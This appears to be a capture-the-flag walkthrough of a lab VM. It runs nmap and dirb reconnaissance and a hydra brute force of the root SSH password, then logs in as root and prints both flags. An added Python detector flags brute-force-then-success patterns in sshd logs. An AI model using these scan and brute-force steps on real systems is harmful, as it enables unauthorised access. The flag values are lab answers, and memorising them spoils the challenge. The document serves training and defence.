TOOLS : netdiscover , nmap , curl , dirb , hydra , ssh
1. Recon
- Get IP of target : GOT 192.168.0.103
$ sudo netdiscover
192.168.0.1
192.168.0.103
- Port scan : GOT port 22 and 80 open
$ sudo nmap -sS -F 192.168.0.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-22 09:47 IST
Nmap scan report for 192.168.0.103
Host is up (0.00013s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:C9:B7:CE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.12 seconds
- Service scan : GOT OpenSSH and nginx
$ sudo nmap -sV -F 192.168.0.103
[sudo] password for zen:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-22 09:54 IST
Nmap scan report for 192.168.0.103
Host is up (0.00026s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
80/tcp open http nginx
MAC Address: 08:00:27:C9:B7:CE (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds
2. Check : 80/http
Inspect Page : Got nothing
$ curl http://192.168.0.103
Dont Overthink. Really, Its simple.
<!-- Trust me -->
Directory check : Still nothing
$ dirb http://192.168.0.103
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun Oct 22 09:58:41 2023
URL_BASE: http://192.168.0.103/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.0.103/ ----
+ http://192.168.0.103/index.html (CODE:200|SIZE:57)
-----------------
END_TIME: Sun Oct 22 09:58:41 2023
DOWNLOADED: 4612 - FOUND: 1
3. Check : 22/ssh
brute force ssh : found credential : root:simple
wordlist :
$ hydra ssh://192.168.0.103 -l root -P rockup.txt -V -f
[22][ssh] host: 192.168.0.103 login: root password: simple
[STATUS] attack finished for 192.168.0.103 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
SSH Login
$ ssh root@192.168.0.103
root@192.168.0.103's password:
IM AN SSH SERVER
gift:~#
GET Flags
gift:~# ls
root.txt user.txt
gift:~# cat root.txt
HMVtyr543FG
gift:~# cat user.txt
HMV665sXzDS
gift:~#
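
Defender's view of step 3, as an added example that is not part of the original notes: a password-guessing run followed by a successful root login leaves a recognisable pattern in the sshd log. The log lines below are constructed in OpenSSH syslog style; the source IPs, the user alice, the function name and the threshold/window values are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log (not captured from the target); IPs, PIDs and users are made up.
SAMPLE_LOG = """\
Oct 22 10:01:01 gift sshd[2101]: Failed password for root from 192.168.0.50 port 40110 ssh2
Oct 22 10:01:02 gift sshd[2102]: Failed password for root from 192.168.0.50 port 40112 ssh2
Oct 22 10:01:03 gift sshd[2103]: Failed password for root from 192.168.0.50 port 40114 ssh2
Oct 22 10:01:03 gift sshd[2104]: Failed password for alice from 192.168.0.20 port 51200 ssh2
Oct 22 10:01:04 gift sshd[2105]: Failed password for root from 192.168.0.50 port 40116 ssh2
Oct 22 10:01:05 gift sshd[2106]: Failed password for root from 192.168.0.50 port 40118 ssh2
Oct 22 10:01:06 gift sshd[2107]: Failed password for root from 192.168.0.50 port 40120 ssh2
Oct 22 10:01:09 gift sshd[2108]: Accepted password for alice from 192.168.0.20 port 51202 ssh2
Oct 22 10:01:10 gift sshd[2109]: Accepted password for root from 192.168.0.50 port 40122 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

def find_bruteforce_success(log_text, year=2023, threshold=5,
                            window=timedelta(minutes=5)):
    """Return (ip, user, time, failures) for every accepted password login that
    follows at least `threshold` failures from the same source inside `window`."""
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so the caller supplies one.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        recent = failures[m["ip"]]
        while recent and ts - recent[0] > window:
            recent.popleft()        # forget failures older than the window
        if m["result"] == "Failed":
            recent.append(ts)
        elif len(recent) >= threshold:
            alerts.append((m["ip"], m["user"], ts, len(recent)))
            recent.clear()
    return alerts

if __name__ == "__main__":
    for ip, user, ts, n in find_bruteforce_success(SAMPLE_LOG):
        print(f"{ts} {user} login from {ip} after {n} failed attempts")
```

A single mistyped password followed by a correct one (alice in the sample) stays below the threshold and is not reported.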